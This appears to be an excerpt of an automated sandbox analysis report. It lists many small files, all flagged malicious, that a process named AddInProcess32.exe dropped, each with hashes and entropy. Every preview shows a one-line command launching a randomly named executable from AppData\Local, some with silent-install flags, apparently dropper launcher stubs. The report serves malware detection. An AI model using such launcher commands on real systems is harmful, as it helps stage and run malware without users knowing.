Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.934702450115979
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5jcc9AeOcWOdEF:fE1sZ23LA9OaF
                                                                                                                                                                                                                                MD5:22E1E519FA71858A92772646F32590A3
                                                                                                                                                                                                                                SHA1:32E411DC18502623AEEC3A0DA3FEB7045ACA55A5
                                                                                                                                                                                                                                SHA-256:83C40748D62797D192EE21CE1AED9469764A06F68EE3537DC114787AC59DE91C
                                                                                                                                                                                                                                SHA-512:5DA885EB200042BA4A9FED18CD4E919EE4A09E902D7CF338572DA03F495C818C1A56E4EADA3AA34B6ABAC4BD93E297065EB5A352D3E690B7D96D14BD0383ACD8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.7696760450737665
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J58D+mB1BHOm:fE1sZ238DZBym
                                                                                                                                                                                                                                MD5:99212DAFB405E16DA88F0FE1125E1A74
                                                                                                                                                                                                                                SHA1:23B48B17043762E270D472796001F89D2FA113D5
                                                                                                                                                                                                                                SHA-256:B2DE0980623E920FE50E36FD5FC9280836460B153BF07AE3601BEC57AFCCE33E
                                                                                                                                                                                                                                SHA-512:0C515FA692335201557CDF1B52CDCAA8202D74EBF8BF6E21492C1BB45A6EF6508917B6A3EE4311D5477B0FEC0CBF8EB52DF249637D1AFB2AEF77EFA05C86A02C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Yu3aePJPmCD2ksmvI16UpN6t.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.7368548493275275
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5wmPaLD8NH+EFNHFn:fE1sZ23wmPa+9v
                                                                                                                                                                                                                                MD5:BFF83D0ECF131C56B865468AC1E9DAAF
                                                                                                                                                                                                                                SHA1:B11D09D0BB392D46E85136D1D7454F5D64E090E2
                                                                                                                                                                                                                                SHA-256:161D6FA854EA8BFB81EC12147DA6E24EA748E4E3B1410C1558EBD7B7F870A1C6
                                                                                                                                                                                                                                SHA-512:D827B5D148BD6D9FCB8C4B1956F82F739ED481D5575AB15EA30B59235CC6D013C3062DDD0B26D85270FCAD22889AAE3A0303793F3190F8050A5F83AFF066395C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\UCtmeOC2UHPIofYPbbfGVnal.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.930866761616118
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5uCnqmMoHIMBQDNl:fE1sZ23uCnqmMXMBwv
                                                                                                                                                                                                                                MD5:FB6914C04B34E4006629B786E018254C
                                                                                                                                                                                                                                SHA1:81626B2C9B878FE16573A72F4FE65933CA2948A6
                                                                                                                                                                                                                                SHA-256:B176DEB61F59ADA86C8F1D4E4AEF574CE4D516F05F46D489649F4E3DDA70CF8B
                                                                                                                                                                                                                                SHA-512:790BC6E3A2130D48F760CA47F2AA50B8CB96EFF75B76B266518B8B3EC3549C9B3788DD5B44B4AAE82AB28445114356FC0DD951589203DF4FDAE30CBF574119EF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\KgnOTzWY3o0raijub6ZAid5Z.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.748401682401873
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5rgN5+X08Jl:fE1sZ23CilJl
                                                                                                                                                                                                                                MD5:196C1542A25A0613A307AA642377E3BF
                                                                                                                                                                                                                                SHA1:49764B5AE243EB7BBE571918200612B97A267632
                                                                                                                                                                                                                                SHA-256:5D0E04E436BD989C9AE1F0992EF3EF0C3B3DB776ECC24DFC73CE5297F397B26F
                                                                                                                                                                                                                                SHA-512:539200CD8BFDC565694B264A3E1E9795DE408AE15D35F2F495E7DD81846194B04D22E076067DEA65C8A652CBC4FAB6745E64B23A2840EB08E03634D048A2AE5F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NwvsoZspGn6vizp2axhKoY0Z.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.843467442344775
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J52Jt1hQcahQDyCHykdan:fE1sZ232jUcrDypD
                                                                                                                                                                                                                                MD5:032ED7DC0EB8BC8BA0C8218BE0D79964
                                                                                                                                                                                                                                SHA1:A662F657B104FE9B7ECCEEB1879731ED84D95B9B
                                                                                                                                                                                                                                SHA-256:C9C0E72EA19D3A60701F930C0BF69C541039B2336E5822E41581B2A808A86F32
                                                                                                                                                                                                                                SHA-512:0F3DDF884D2E3587CB8E8C91676EAB0045AB0A76DCEB44529C781DBDF5F772A1BFE7C65E9B080DA011630A706D85576872619570B2CD303066392D0A455B61B8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\SlHGsDZGgkpk7MxF0QDuypot.exe" --silent --allusers=0
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.787721153738063
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5PAB2md1tgUln:fE1sZ23oneUl
                                                                                                                                                                                                                                MD5:811AA358597D43C04B870452F01A1B30
                                                                                                                                                                                                                                SHA1:4FEA92D85C882C07DF9D2652D0373EA436229DA5
                                                                                                                                                                                                                                SHA-256:E8410EA67C7C46A21A8AA7A0F108A552561F79D2C818EC723DEA3F006E010809
                                                                                                                                                                                                                                SHA-512:35C6D5843ADA72D915CA37110FCBC8784E56ED2633888D1DFD7EE24DC38AD904CFCC026B9868C764C72F3389C31C06F9360816DC5771380A60E8640FFDC00317
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\jTODdSkaulFxtvMU8WoUUyzs.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.950693798634243
                                                                                                                                                                                                                                Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5I1KhScdccCg2kAHF:fE1sZ23IYEc8JF
MD5:A7550B2D445A83B05221512A51354D97
SHA1:A1959113695A221C60FB06D8DAAD443ADD2E65B2
SHA-256:39CD877F0E2FDA3A769171B00262C5B728A9F838D689A717FA3B08E56409994F
SHA-512:27B0D54093AFF0B2761D223CE6D8639C38CEA2CBBBE428F3FD9C633652FF88D18E1A4AAA67149BD97106C2B617497DFD7161401E09C05F69A46FBD5045360651
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\mPkGObww76qlp1C09a4tgBES.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.918104667105449
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J51rShQaXJIXc7LAdiF:fE1sZ23hSZXis7LAEF
MD5:26120E74BCDF08CB2728ED54A7E17086
SHA1:569B719B7AB535FD707475525C1466E6B62DD5DE
SHA-256:D443AC2934BF29EC31AD5570C504A0B6F0C94D1735A571CF4F11F9E28091B39E
SHA-512:7841C67D2155F64EB6D2A7E52B673C420860613D508635D8E3174DD67EE50900C37DA3D7229F907B60AC3FA34C4DBD2B4CD672DE74650C6D810082AF6BBDAF4E
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\PNqnjNHui8frV2dffCZrA05K.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.818760421130473
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5cahIWLpK158EFn:fE1sZ23cv8uis
MD5:ABE0EFC68FFB07CA33462EF390AF0AF6
SHA1:4EAD20667EEAF63B67980C4741345C6E8B5EB6DA
SHA-256:7A8A3FD33CE1E55D949CA7DAE6E868509878E70CF1E7D794DF7281252CB0D9D7
SHA-512:1BA93EFD46F0AF8F363AC18B346986275542724A5C95B09B7A8C8A53F93D42CF92474520AE4A9371F7987DA861122C55A5D56BD835BB055E9B2C4A2DD0729419
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\ymBV9PkPmsW6KLoPxnFlPP0z.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.824043435284099
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5BA8X/RKmCJCJFn:fE1sZ239X0mN
MD5:C1C1873E393FD8A1396EAD46240D0C1F
SHA1:0E2E2E3D988EB04EAE9ACAC3949E67F193939659
SHA-256:C58F058D7402417C6EE9291EB353965E77A5F95258511443C1D30D00881CA5D3
SHA-512:68DFB894FA2F04DEEE69D81AE662AFD39BD7036BF66CDC775059ABF6C01CD76E27D048B595BAE801EC665C657A525BC9B86B641CC21ED28FBA51389C1B616521
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\deCnBzZpp4FSC4HClFNfim7T.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.789774913884095
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5k5qmqsLk0CHF:fE1sZ23k5qEk0Cl
MD5:5A02F3FDE970F3FEFF6301C3CE3FFA2F
SHA1:8BBF1EE29BEC697CB6EA3530019A9616F9B29C74
SHA-256:4B7CD8BA2E85E9B09C9B4018DD216764CD1CD2FBEAE05BBB613236D5872C620C
SHA-512:E95D96F37F0AA8968D75ED6178C028B312E3F65053709E32DEF1CC06C811DFC6E171E771B2729D1FCB916FABE5AC5EB6A4C53D6A4D8AEAAB791311F01B0D9D30
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\A7Npgp1C644Vm1weiCOIngpF.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.958030572933904
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5z0iQp/Ujx4mn:fE1sZ23KVi4m
MD5:0412E80AC6860023054BB366402CE59E
SHA1:0BC6E18A31036BF3EAE7358D9FD71213EF4AB366
SHA-256:392210AC30E877B853E674788851442942FB0F98F579032AB41E19D149C757A2
SHA-512:4CEDB84833552E342F351A8274F2CC2927D93D041810552763A44248BE299A4C33E7A722A02CA8139C303A590DEA7EC4A09808CF7E90375801ACBE47FE16DDDB
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\VgRPuj2QfERyAHULRBeO1F20.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.916050906959415
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5RoxqtGKsKAs:fE1sZ23Vcs
MD5:239882AFEFC18F9B4F921471A81E1E74
SHA1:5C12791B39257FC74D0B7C04496487351357E8E8
SHA-256:B9F2BBA2E3F2472C010113F48A8BE8BB08F643E34651597CDBBAB91B73B483DD
SHA-512:2F4014319F0A938EA7507F198CAF6AB69B766D7AF80BB136D3F47965E6F39B51941DF7202D744028BEF09E2623438799E9004D0FD7DA996367CC9A543F45C1F9
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\tM9DijOJq3CQOn3hcO2NIvuX.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.876731435623226
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5SKiEuQs4BCln:fE1sZ23SKTBs
MD5:B841BD3C053DFAD2AB1859F1E1D49CBC
SHA1:EF0AEBC9F39595EFEC125BC284344534EBAEFF19
SHA-256:6203B3496B820EC828261F1DC2C817C30469F345FFB804E368C42305236537FC
SHA-512:78957F3EE767C5DE2A1C8E8746D921DCC972E3D0FBB0BEEC0A3CDBFADFB9E69328E7180F2EB3EE71C50109CD592A62389ED99265BAEA081174A2B94B88F26B4B
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\wDhpi03qlIbaSzF5WZoKo8eV.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.8781276143310395
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5H+sXRowkdan:fE1sZ23PRD
MD5:928304A0F485D6A62B9559471BB0DE06
SHA1:96784C366C1191783B4973B5B5A3FC3F104E0B36
SHA-256:A27D96138A11AFD516D34890912C7E13622A24C8BB1CD615619C9AD5C70E8907
SHA-512:C1B0ED8ED397B60BAA55F26FB8D05BFFD0BD38542A0A7BCF78CD3CBDF7124A20D400D0F63EC5AB80F09A1FAC49EFC521118907A9350F09200F1849B1BCF86775
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\bw9CU3SIyrt3JEs5ELMi3GM3.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.865791037041147
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5fcy3pWHT1xjjZ:fE1sZ23NZATDjjZ
MD5:0B7BE702A5F1F2A0CDDD1F6FE5C58E50
SHA1:180962A6E9F89FBFA21438B094513559499F7F53
SHA-256:499272D968E4E4001500778B261584F50A34F1507C2E26D5BC1DAD85DF8BBAED
SHA-512:A173924CDA1B5D82DD83285F0796DF269D537B4CCF1D9AF7A6F4CA66CD7586D3918A5226EB5049F763D411BDC1EA31DF1E0519796AC0FABCAF2B7BA299DF11A0
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\zfeRg1KL3b6mzyGkHfaolHvL.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.796879623966314
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5XZyyZDHNl:fE1sZ23JyyZb
                                                                                                                                                                                                                                MD5:4140190BE38497B275A848CDA4A44E68
                                                                                                                                                                                                                                SHA1:231F46CFD8E03DF6344C1B28336F6C5017450867
                                                                                                                                                                                                                                SHA-256:4E7E671706C746AB3811CE799B35C1CC92E4FC58719AB1BCA2626F3E628C16DE
                                                                                                                                                                                                                                SHA-512:899A2C35D61E9B182C3E9BA92B08D04113D3B78BBE26C3A0B22DB419216F47A5FE7E5725E153A6CD5C946F02DEB485BAD6AD5021BD2675CBB21EBA4C92F7A53A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\rdJ9fWEopei9Jq2a4C4fmX3Z.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.947090174351825
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5A3e3UT7cOiF:fE1sZ23AYect
                                                                                                                                                                                                                                MD5:B0B118FCE24B51323DEE0FBD2E236672
                                                                                                                                                                                                                                SHA1:F590ECB42517F0E7DE166511CD22168DDB2E128C
                                                                                                                                                                                                                                SHA-256:C7F3CEEA279EAAB5663954682E6679426E53B12BB2272BB86BE280D1644252E8
                                                                                                                                                                                                                                SHA-512:991CDF07B9035CDA95DA70DB11C4A9A5DDEC66CC6A5F44AA33BDE73E5A1E5213F06F22EE902CB844D977E15F5F755E7871EC93D36D8E2966617FE19858FFBCA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\eRAYqRRIfUj5yD0ovEh9HMd4.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.925209377187667
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5SOVr7elp6Adm:fE1sZ23SO17R4m
                                                                                                                                                                                                                                MD5:CB44F8B2986C55F4D939056A521135BB
                                                                                                                                                                                                                                SHA1:378D82B44DD2942218FA14CE281B4DDEE818559D
                                                                                                                                                                                                                                SHA-256:1BCC31960A0351DD3142BE12A619E9125AC4F4B2C53F558F8AEAFEDDC95345AE
                                                                                                                                                                                                                                SHA-512:0FEB80B51AE7670DD8F171F0D8ADCD97B79724633B41CB8092659A87C2737EAD82BD79A31C48DCA624DAA8810A4B3D94107815CBDC17B88EB578442DAA669CE4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wkp6W1E2mbyM9VriyJKcQkLy.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.916050906959415
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5UiOZwyIcVLeln:fE1sZ23UiOqyhwl
                                                                                                                                                                                                                                MD5:B097CCD4841E23D3FC4BEE669FC9659F
                                                                                                                                                                                                                                SHA1:D8FEA7766D2B5ECECF4F16B7DE528CAC1648E08B
                                                                                                                                                                                                                                SHA-256:946EFA5836D3A2319C3C5E440D5BE760C891F089428002FAB6DE415DFF6045C7
                                                                                                                                                                                                                                SHA-512:8F501A3D185C14137177B316B9376D00D34AC4EDCDA67319D1855E867991789A3F2A94E8AA0BACA3386FB0DA5F2CFBDA3F57706EE84F0E5C501673A70362134B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\qGkRm1tZi3ZgbNWlurynDnJq.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.85436133113751
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5jYt1VqLNlIkdan:fE1sZ23UfvD
                                                                                                                                                                                                                                MD5:1D7FD7D26FB70A1D81E9A24F01B8BAE2
                                                                                                                                                                                                                                SHA1:AC22D8035BF2AA6763D9D40278E525D647A4B336
                                                                                                                                                                                                                                SHA-256:30548BFBA8E6D6CA059D992213BA4513A808C1E818126EA9B89F5E3D140B8168
                                                                                                                                                                                                                                SHA-512:AB6F42340521B7BAB577BF7ECC016DB760E9F94C79D9B82A6F668C3C8E9C09D77766A666C9568E5BEE60B1967F37C8655C0A4A2730EFE7D544E5C8A544038798
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Fh7qhqxo9lqcq8fZJGpCZFiC.exe" --silent --allusers=0
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.936406642084778
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5NuJqDs0wTrPCSkdan:fE1sZ23ps0grhD
                                                                                                                                                                                                                                MD5:15DFB05C0A9138E3E574FE4EDA6E19A4
                                                                                                                                                                                                                                SHA1:49A13C100528FFE8DD50D7CD8BA79B4D9668CA88
                                                                                                                                                                                                                                SHA-256:F48A230D5CF6CCED6D447CAD20C2E6E4768BCD5B71505FF71A99DAB63050B771
                                                                                                                                                                                                                                SHA-512:422279EB2771959F48474DDCC831CEC36CC1288E7E3094233B2E7DCC4B99403C0E169BC32A890113012EA866D14FC93C9C62CE01FEB50229F62E0D53B7A59EE1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\hK1ls0Ofsd3l9PBQOnBvFrY4.exe" --silent --allusers=0
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.9379317041235735
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J52fLQXJitvdiF:fE1sZ232zQXstsF
                                                                                                                                                                                                                                MD5:7909E132F2890A5A5B5FA7DD3ED2FD58
                                                                                                                                                                                                                                SHA1:4994FBF68C2945E12C48E1ACB8B289AAE177F7BD
                                                                                                                                                                                                                                SHA-256:94E8419EA02CA5A409300EB5629FCA6E84099D7B8D31E421F219D5DD028C144E
                                                                                                                                                                                                                                SHA-512:C3247E78EC3EC17A40B50ADFCD3EAF0306586D68EF3137B750991BF30324B3F76DF1C48D3E0173F441F9272876FF7184DB08CC968906A02DC49C81AA66B4207C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\SzeKmiZzCnF5yGTNutlHXxk9.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.782063769309611
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5RWAC21pCQ45tHF:fE1sZ231CgsP
MD5:18E97AA59265DD24AE7F60A3AB607D7E
SHA1:D6C9E378E1E6EB4F3A45BB73FDC0E374C645FE3C
SHA-256:1AA14148EBC18CB0F86C38E81DF3863D991839F66586791E22CB0D8E05BB8C21
SHA-512:0E03631015E77A45BD5274870D309013D6E9304C800035A82FE811452E067CEFE0338B9C98A5292725DE29ABA625F0D555C1B735931300156649B4A2DA59BB8A
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\tse6OoEOj17quPLpMuzuQXuv.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.929128619506404
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5WMSccnIIkdan:fE1sZ23WFcMD
MD5:764E94E5313A7604BA4ED2F993DF07B5
SHA1:6F0DECD618030DED40E6FA3C7C4CECB7AA6D15A9
SHA-256:D689359CF4FA044152391BECF091ED944A9C6C2FD88748ECE77037F77DFF519F
SHA-512:F8D7260BFD26A8F7E3AAC20674AB832C400D15D43A967CF9A69BC8CBB346E075EA7A8B5C2DA840535D7CF51DF79C0B6B802A9053A654A65B84709566FBC14B64
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\sJ72s0PpaBNUmYNiHyJZFP9z.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.7767807551559835
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5x/ofggJKXEvn:fE1sZ235oIEv
MD5:2F791D250445908D2B2C6D8989913C04
SHA1:67947BA39674428ABD587E4DBB988761BC696784
SHA-256:9020E431C6C27ED519226E813C01D1D73F8E382183AAF4E1B989C9EAD42BC6BC
SHA-512:EF9B63BA032D889F2B67D4FF43432643B8A2D6335D713C2156A5942B6C6ABE0D202CA078DF655779E59257809E7E8BB9F138BFD4C4F1FBD51094AE4BC8CE5B22
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\TZNY2jGrHaeFElorDDQMNtS0.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.844112125568592
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5mfmkNHASXnL0pkdan:fE1sZ23mLV3YpD
MD5:361741FA1BF31E074C0C753071BF40F6
SHA1:15FD6BFBA7D55B9D400E21609BDCC5F464100028
SHA-256:CB967304536F75D35CC3B01DC8D56B1814D4C1E6762F40456D43FDB716FABF79
SHA-512:8FF1BC730DAB5FF9A640CC5C1EC1C2DB0A2E6FF2AF89B6BF15BC442C348D9FED693E32DC47FD459016F81696EC7C1F3960BEFCFAA8A60A0B1BC41493907F1ED9
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\CzCAVDbVcAMwrBna8hMGEVEa.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.831148145366318
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5QtDd9Zm4mn:fE1sZ23QtD/Zc
MD5:C79DBA5B76202C1870C33527B5800A0B
SHA1:507D2ACAD62BEB76970E0D1FFF5A5C4DD62B7D09
SHA-256:679539A884B6EEBE43DC9A088FB54967E07282413B717E7ABCE783E12A03B23A
